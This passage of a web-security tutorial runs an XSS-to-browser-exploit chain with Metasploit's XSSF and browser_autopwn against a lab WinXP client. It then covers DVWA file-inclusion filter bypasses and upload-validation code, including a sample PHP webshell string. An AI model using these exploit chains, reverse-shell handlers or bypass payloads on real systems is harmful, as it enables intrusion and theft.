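The checker deliberately parses the output rather than grepping it for strings such as `onmouseover=`: in the hardened page that substring is still present, but only inside an escaped attribute value where the parser (and the browser) treat it as text. Escaping must match the context; html.escape covers text nodes and quoted attributes, while a value placed inside a script block or a URL needs its own encoding.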

Using Metasploit

Metasploit also has a plugin for XSS; installation tutorial: https://blog.csdn.net/AcSuccess/article/details/73485583. This module is old, so it sometimes does not match newer msf rules.

Open metasploit and start testing:

# Load the XSSF plugin
msf5 > load xssf
[-] Your Ruby version is 2.5.3. Make sure your version is up-to-date with the last non-vulnerable version before using XSSF!



____ ____ ______ ______ ________
|_ _||_ _|.' ____ \ .' ____ \ |_ __ |
\ \ / / | (___ \_|| (___ \_| | |_ \_|
> `' < _.____`. _.____`. | _|
_/ /'`\ \_ | \____) || \____) | _| |_
|____||____| \______.' \______.'|_____| Cross-Site Scripting Framework 3.0
Ludovic Courgnaud - CONIX Security


[+] Please use command 'xssf_urls' to see useful XSSF URLs
[*] Successfully loaded plugin: xssf

# URLs provided by xssf
msf5 > xssf_urls
[+] XSSF Server : 'http://10.10.10.128:8888/' or 'http://<PUBLIC-IP>:8888/'
[+] Generic XSS injection: 'http://10.10.10.128:8888/loop' or 'http://<PUBLIC-IP>:8888/loop'
[+] XSSF test page : 'http://10.10.10.128:8888/test.html' or 'http://<PUBLIC-IP>:8888/test.html'

[+] XSSF Tunnel Proxy : 'localhost:8889'
[+] XSSF logs page : 'http://localhost:8889/gui.html?guipage=main'
[+] XSSF statistics page: 'http://localhost:8889/gui.html?guipage=stats'
[+] XSSF help page : 'http://localhost:8889/gui.html?guipage=help'

Next we place this link in the user's blog. Once someone is tricked into clicking it by some means (for example by swapping in a different URL), it takes effect. After the WinXP client on the internal network clicks the link:

The user's information then appears in the log of the xssf GUI on the attacking machine:

As can be seen, the request came from 10.10.10.254; the client runs 32-bit WinXP and uses the IE browser. Next we attack it with msf:

# Detailed client information
msf5 auxiliary(server/browser_autopwn) > xssf_information 1

INFORMATION ABOUT VICTIM 1
============================
IP ADDRESS : 10.10.10.254
ACTIVE ? : TRUE
FIRST REQUEST : 2019-02-09 22:07:23
LAST REQUEST : 2019-02-09 22:23:53
CONNECTION TIME : 0hr 16min 30sec
BROWSER NAME : Internet Explorer
BROWSER VERSION : 6.0
OS NAME : Windows
OS VERSION : XP
ARCHITECTURE : ARCH_X86
LOCATION : http://10.10.10.128:8888
XSSF COOKIE ? : YES
RUNNING ATTACK : NONE
WAITING ATTACKS : 0


# Configure and use the browser_autopwn module
msf5 > use auxiliary/server/browser_autopwn
msf5 auxiliary(server/browser_autopwn) > options
Module options (auxiliary/server/browser_autopwn):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The IP address to use for reverse-connect payloads
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)


Auxiliary action:

Name Description
---- -----------
WebServer Start a bunch of modules and direct clients to appropriate exploits


msf5 auxiliary(server/browser_autopwn) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf5 auxiliary(server/browser_autopwn) > set SRVHOST 10.10.10.128
SRVHOST => 10.10.10.128
msf5 auxiliary(server/browser_autopwn) > exploit
[*] Auxiliary module running as background job 0.

[*] Setup
msf5 auxiliary(server/browser_autopwn) >
[*] Starting exploit modules on host 10.10.10.128...
[*] ---

[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/UpcSM
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://10.10.10.128:8080/NJNtplVtwKv
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://10.10.10.128:8080/dFOtVUOMPmc
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://10.10.10.128:8080/oQIYImSFPVkT
[*] Server started.
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/STMNDtGOTiANY
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/uBrKmGeGJoM
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/PHlayF
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/btZYRTHW
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/MtrrbGqvxBGp
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/gqnIrlsGGGL
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://10.10.10.128:8080/qjoHtDYsUA
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/VTRsYvyICuI
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/nscgcOF
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/gcErPNn
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/nozikgfm
[*] Server started.
[*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/doNKZzOvFhj
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/hyVgsOceIkWv
[*] Server started.
[*] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp
[*] Starting exploit windows/browser/ms13_090_cardspacesigninhelper with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/qDXS
[*] Server started.
[*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/Zxijin
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse TCP handler on 10.10.10.128:3333
[*] Using URL: http://10.10.10.128:8080/aaeoheX
[*] Server started.
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse TCP handler on 10.10.10.128:6666
[*] Started reverse TCP handler on 10.10.10.128:7777

[*] --- Done, found 20 exploit modules # 20 exploit modules in total are loaded and ready to attack

[*] Using URL: http://10.10.10.128:8080/P8ZELlXN4
[*] Server started.

# list them
msf5 auxiliary(server/browser_autopwn) > jobs

Jobs
====

Id Name Payload Payload opts
-- ---- ------- ------------
0 Auxiliary: server/browser_autopwn
1 Exploit: android/browser/webview_addjavascriptinterface android/meterpreter/reverse_tcp tcp://10.10.10.128:8888
2 Exploit: multi/browser/firefox_proto_crmfrequest generic/shell_reverse_tcp tcp://10.10.10.128:6666
3 Exploit: multi/browser/firefox_tostring_console_injection generic/shell_reverse_tcp tcp://10.10.10.128:6666
4 Exploit: multi/browser/firefox_webidl_injection generic/shell_reverse_tcp tcp://10.10.10.128:6666
5 Exploit: multi/browser/java_atomicreferencearray java/meterpreter/reverse_tcp tcp://10.10.10.128:7777
6 Exploit: multi/browser/java_jre17_jmxbean java/meterpreter/reverse_tcp tcp://10.10.10.128:7777
7 Exploit: multi/browser/java_jre17_provider_skeleton java/meterpreter/reverse_tcp tcp://10.10.10.128:7777
8 Exploit: multi/browser/java_jre17_reflection_types java/meterpreter/reverse_tcp tcp://10.10.10.128:7777
9 Exploit: multi/browser/java_rhino java/meterpreter/reverse_tcp tcp://10.10.10.128:7777
10 Exploit: multi/browser/java_verifier_field_access java/meterpreter/reverse_tcp tcp://10.10.10.128:7777
11 Exploit: multi/browser/opera_configoverwrite generic/shell_reverse_tcp tcp://10.10.10.128:6666
12 Exploit: windows/browser/adobe_flash_mp4_cprt windows/meterpreter/reverse_tcp tcp://10.10.10.128:3333
13 Exploit: windows/browser/adobe_flash_rtmp windows/meterpreter/reverse_tcp tcp://10.10.10.128:3333
14 Exploit: windows/browser/ie_cgenericelement_uaf windows/meterpreter/reverse_tcp tcp://10.10.10.128:3333
15 Exploit: windows/browser/ie_createobject windows/meterpreter/reverse_tcp tcp://10.10.10.128:3333
16 Exploit: windows/browser/ie_execcommand_uaf windows/meterpreter/reverse_tcp tcp://10.10.10.128:3333
17 Exploit: windows/browser/mozilla_nstreerange windows/meterpreter/reverse_tcp tcp://10.10.10.128:3333
18 Exploit: windows/browser/ms13_080_cdisplaypointer windows/meterpreter/reverse_tcp tcp://10.10.10.128:3333
19 Exploit: windows/browser/ms13_090_cardspacesigninhelper windows/meterpreter/reverse_tcp tcp://10.10.10.128:3333
20 Exploit: windows/browser/msxml_get_definition_code_exec windows/meterpreter/reverse_tcp tcp://10.10.10.128:3333
21 Exploit: multi/handler windows/meterpreter/reverse_tcp tcp://10.10.10.128:3333
22 Exploit: multi/handler generic/shell_reverse_tcp tcp://10.10.10.128:6666
23 Exploit: multi/handler java/meterpreter/reverse_tcp tcp://10.10.10.128:7777

# use job 15 (ie_createobject) for the attack
msf5 auxiliary(server/browser_autopwn) > xssf_exploit 1 15
[*] Searching Metasploit launched module with JobID = '15'...
[+] A running exploit exists: 'Exploit: windows/browser/ie_createobject'
[*] Exploit execution started, press [CTRL + C] to stop it !

[+] Remaining victims to attack: [[1] (1)]

[*] 10.10.10.128 ie_createobject - Sending exploit HTML...

[+] Code 'Exploit: windows/browser/ie_createobject' sent to victim '1'
[+] Remaining victims to attack: NONE

After that, the content we want to show the other side (auxiliary/xssf/public/misc/alert) is displayed in the victim's browser (I don't know why the content was not shown here, only an empty box):

Once a client views this blog and clicks the link, the exploit HTML is served to their browser; if the browser or one of its plugins is vulnerable to one of the loaded modules, a session comes back to the matching handler (ports 3333/6666/7777 above) and there is a chance to take control of their machine.

File inclusion and file upload vulnerabilities

Local File Inclusion (LFI) and Remote File Inclusion (RFI) are the two forms of file inclusion attack. File upload is a separate weakness, but the two are commonly chained: a file uploaded to the server is then pulled in through an inclusion bug.

Local file inclusion means a file on the web server is pulled into the page through a parameter controlled from the browser; the root cause is that the application does not properly validate the user-supplied path before handing it to include()/require().

Here are four simple examples, all from DVWA's File Inclusion page (low, medium, high, impossible).

# low
<?php

// The page we wish to display
$file = $_GET[ 'page' ];

?>
# No filtering at all: step up the tree with ../ and try repeatedly to work out the server's directory structure

# medium
<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\\" ), "", $file );

?>
# Strips http:// and https:// to prevent remote file inclusion, and ../ (and ..\) to prevent directory traversal
# Weakness: str_replace runs a single pass, so the check is useless against nested forms such as htthttp://p:// or ....// which collapse into exactly the blocked string

# high
<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>
# fnmatch() requires the included file name to start with "file" (or be exactly include.php)
# The file:/// wrapper, used to read local files, also starts with "file", so a path like file:///etc/passwd passes the check and still includes a local file

# impossible
<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>
# Nothing to do here: an exact allowlist rules out file inclusion altogether
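To make the difference between the four filters concrete, here is an added Python re-implementation of their logic (not DVWA's own code, and not part of the original post) that runs the bypasses described in the comments against each level and adds one stricter path check. `WEB_ROOT`, `safe_local_path` and the payload strings are constructed for this example.

```python
"""Python re-implementation of the four DVWA File Inclusion filters shown
above, with the bypasses described in the comments, plus one stricter check.
Added example: not DVWA's code; WEB_ROOT is a constructed example path."""
import fnmatch
import posixpath

WEB_ROOT = "/var/www/html/vulnerabilities/fi"   # constructed, not a real host path
ALLOWED_PAGES = {"include.php", "file1.php", "file2.php", "file3.php"}


def filter_low(page: str) -> str:
    """low: the parameter reaches include() untouched."""
    return page


def filter_medium(page: str) -> str:
    """medium: mirrors PHP str_replace(array(...), "", $file).
    Each needle is removed in one left-to-right pass and the result is never
    re-scanned, so a payload that wraps the blocked string inside another copy
    of itself survives as exactly the blocked string."""
    for needle in ("http://", "https://", "../", "..\\"):
        page = page.replace(needle, "")
    return page


def filter_high(page: str) -> bool:
    """high: PHP fnmatch("file*") (case-sensitive, '*' also matches '/')
    or exactly include.php.  True means the include is allowed."""
    return fnmatch.fnmatchcase(page, "file*") or page == "include.php"


def filter_impossible(page: str) -> bool:
    """impossible: exact allowlist; nothing else is ever included."""
    return page in ALLOWED_PAGES


def safe_local_path(page: str, root: str = WEB_ROOT):
    """Stricter alternative for cases where an exact allowlist is impractical:
    refuse any stream wrapper or absolute path, normalise the joined path and
    require the result to remain inside root.  Returns the path or None."""
    if "://" in page or page.startswith(("/", "\\")) or "\x00" in page:
        return None
    resolved = posixpath.normpath(posixpath.join(root, page))
    if not resolved.startswith(root.rstrip("/") + "/"):
        return None
    return resolved


if __name__ == "__main__":
    for payload in ("../../../../etc/passwd", "....//....//etc/passwd",
                    "htthttp://p://10.10.10.128/shell.txt",
                    "file:///etc/passwd", "file1.php"):
        print(f"{payload!r:40} medium->{filter_medium(payload)!r:34} "
              f"high={filter_high(payload)!s:5} "
              f"impossible={filter_impossible(payload)!s:5} "
              f"strict={safe_local_path(payload)}")
```

Running it shows `....//....//etc/passwd` leaving the medium filter as `../../etc/passwd` and `file:///etc/passwd` being accepted by the high filter, while only the exact allowlist and the normalised-path check reject everything but the intended pages.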

File upload vulnerabilities follow the same principle: the file type is not filtered properly, so an attacker can plant a webshell (trojan script) and similar on the server.
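As an added example of what "filtering the file type properly" means (my code, not DVWA's), the check below contrasts a weak validator that trusts the client-supplied Content-Type and substring-matches the extension with a stricter one that allowlists the last extension, verifies magic bytes and discards the user-supplied name. The weak check and the sample webshell/PNG bytes are constructed for illustration.

```python
"""Weak versus stricter server-side upload validation.  Added example, not
DVWA's code: the weak check is a constructed stand-in for the usual mistakes
(trusting the client's Content-Type header, substring-matching the name)."""
import os
import secrets

# Allowlisted extensions and the magic bytes a file of that type must start with.
ALLOWED = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
IMAGE_TYPES = {"image/jpeg", "image/png", "image/gif"}

# Constructed sample inputs for the demo below.
PHP_SHELL = b"<?php system($_GET['c']); ?>"      # constructed webshell body
REAL_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16    # constructed PNG header


def weak_upload_check(filename: str, content_type: str, data: bytes) -> bool:
    """Accepts if the client *says* it is an image and an image extension
    appears anywhere in the name.  Both are attacker-controlled and the
    bytes are never inspected, so shell.jpg.php with
    Content-Type: image/jpeg sails through."""
    name = filename.lower()
    return content_type in IMAGE_TYPES and any(ext in name for ext in ALLOWED)


def strict_upload_check(filename: str, data: bytes):
    """Returns the name to store the file under, or None to reject.
    - basename only: any directory component the client sent is dropped
    - the LAST extension must be allowlisted (.php, .phtml, .jpg.php are out)
    - the content must start with that type's magic bytes
    - the stored name is random, so the user-supplied name never reaches
      disk and multi-extension tricks such as x.php.jpg lose their name"""
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or "\x00" in base:
        return None
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        return None
    if not data.startswith(ALLOWED[ext]):
        return None
    return secrets.token_hex(8) + ext


if __name__ == "__main__":
    for name, ctype, body in (("shell.jpg.php", "image/jpeg", PHP_SHELL),
                              ("shell.php.jpg", "image/jpeg", PHP_SHELL),
                              ("../../evil.png", "image/png", REAL_PNG)):
        print(f"{name:16} weak={weak_upload_check(name, ctype, body)!s:5} "
              f"strict={strict_upload_check(name, body)}")
```

Magic bytes only prove the file starts like an image, not that it is harmless (a valid JPEG with PHP appended still passes), which is why the stored name is random with an allowlisted extension and the upload directory must additionally be served without script execution.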
